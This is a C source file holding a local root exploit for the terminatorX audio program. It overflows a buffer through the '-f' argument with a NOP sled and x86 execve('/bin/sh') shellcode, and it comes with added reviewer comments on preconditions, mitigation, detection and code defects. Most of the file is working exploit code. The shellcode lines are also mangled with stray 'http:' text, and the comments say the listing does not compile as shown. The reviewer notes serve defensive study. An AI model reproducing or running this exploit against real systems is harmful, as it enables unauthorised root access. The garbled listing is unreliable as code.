/* terminatorX exploit by phender, shout outs to Morristown potheads and all the hot girls, prom is commin up */
/* aim: weezedup email: phender@hackermail.com */
/* This will gain local root access if terminatorX is compiled with --enable-capabilities or --enable-suidroot */
/* Thanks to c0wboy from 0x333 for pointing out the bug */
/* Tested on Slackware */

/*
 * Reviewer summary (defender's reading of this listing):
 *
 * - What it is: a local privilege-escalation proof of concept. It builds a
 *   299-byte string and hands it to terminatorX as the value of the "-f"
 *   command-line option. The vulnerable code in terminatorX is not shown on
 *   this page; presumably the "-f" value is copied into a fixed-size stack
 *   buffer without a length check (to be confirmed against the terminatorX
 *   source).
 * - Precondition, per the author's note above: terminatorX must have been
 *   built with --enable-capabilities or --enable-suidroot, i.e. it runs with
 *   elevated privilege. A build without either option gives the caller
 *   nothing it did not already have.
 * - Mitigation: do not install terminatorX setuid root or with file
 *   capabilities; apply the distribution's fixed package (the fixed version
 *   is not stated on this page). The technique as written relies on an
 *   executable stack and a predictable stack address, so non-executable
 *   stacks, ASLR and stack protectors all interfere with it.
 * - Detection: an exec of terminatorX whose "-f" argument is hundreds of
 *   bytes long and contains long runs of 0x90 bytes is not a legitimate
 *   file name. Auditing for unexpected setuid-root binaries covers the
 *   precondition.
 * - State of the listing: it was damaged in extraction. The header names
 *   after #include are missing and the per-line shellcode comments are
 *   mangled (note the stray "http:" before each "//"). The code is kept
 *   exactly as found and does not compile as shown.
 */

/* Header names were lost in extraction; the code below uses printf, exit,
 * atoi, memcpy, memset, strcpy, strlen and execlp. */
#include
/*offsets 230-200*/
#define BUFSIZE 300

long get_sp(void);

/* from shellcode.com.ar */
/* x86 Linux payload; per the author's annotations it issues int $0x80 with
 * syscall number 0xb (execve) on the trailing "/bin/sh" string. */
char shellcode[]=
"\xeb\x18"http://jmp0x18// 3-4
"\x5e"http://popl%esi// 5
"\x89\x76\x08"http://movl%esi, 0x8(%esi)// 6-8
"\x31\xc0"http://xorl%eax, %eax// 9-10
"\x88\x46\x07"http://movb%al, 0x7(%esi) // 11-13
"\x89\x46\x0c"http://movl%eax, 0xc(%esi)// 14-16
"\x89\xf3"http://movl%esi, %ebx// 17-18
"\x8d\x4e\x08"http://leal0x8(%esi), %ecx// 19-21
"\x8d\x56\x0c"http://leal0xc(%esi), %edx// 22-24
"\xb0\x0b"http://movb$0xb, %al// 25-20 0xb to eax (syscall execve)6
"\xcd\x80"http://int$0x80// 27-28
"\xe8\xe3\xff\xff\xff"http://call-0x1d
"/bin/sh";

/*
 * Entry point. Takes exactly one argument, an integer offset that is
 * subtracted from this process's own stack pointer to form a guessed
 * address. It then assembles the argument string in buf and replaces the
 * process with terminatorX.
 *
 * NOTE(review): no return type is declared (implicit int) and nothing is
 * returned; if execlp fails, control simply falls off the end of main.
 */
main(int argc, char *argv[]) {
    char buf[BUFSIZE];
    long ret;
    int i;
    if(argc != 2){
        printf("Usage: %s [Try values 230-200]", argv[0]);
        exit(1);
    }
    /* atoi performs no validation; non-numeric input yields 0. */
    ret = get_sp() - atoi(argv[1]);
    /* NOTE(review): one %p conversion but two arguments; what gets printed
     * is a fresh get_sp() value, not ret. */
    printf("Using ret of: %p\n", get_sp(), ret);
    /* Fill all 300 bytes with the low 4 bytes of ret, repeated 75 times.
     * Copying 4 bytes out of a long assumes a 32-bit x86 target. */
    for(i = 0; i < (BUFSIZE/4); i++){
        memcpy(&buf[i*4], &ret, 4);
    }
    /* Overwrite the first 150 bytes with 0x90 (x86 NOP). */
    memset(buf, 0x90, 150);
    /* Place the payload at offset 50; strcpy also writes its terminating NUL... */
    strcpy(&buf[0]+50, shellcode);
    /* ...which is replaced here so the string continues past the payload. */
    buf[50+(strlen(shellcode))] = 0x90;
    /* Terminate the string: the argument passed on is at most 299 bytes. */
    buf[BUFSIZE-1] = 0;
    /* execlp resolves "terminatorX" through PATH; its result is not checked. */
    execlp("terminatorX", "terminatorX", "-f", buf, NULL);
}

/*
 * Returns the caller's stack pointer by moving %esp into %eax.
 * NOTE(review): there is no return statement, so the function depends on
 * the compiler leaving %eax untouched as the return register. The C
 * standard makes using that value undefined behaviour, and the asm names
 * 32-bit x86 registers only.
 */
long get_sp(void) { __asm__("movl %esp, %eax"); }

/* The original file closes with a long block comment quoting the lyrics of
 * "Rabbit in Your Headlights" (Radiohead and DJ Shadow, as credited by the
 * author); it carries no technical content and is condensed to this note. */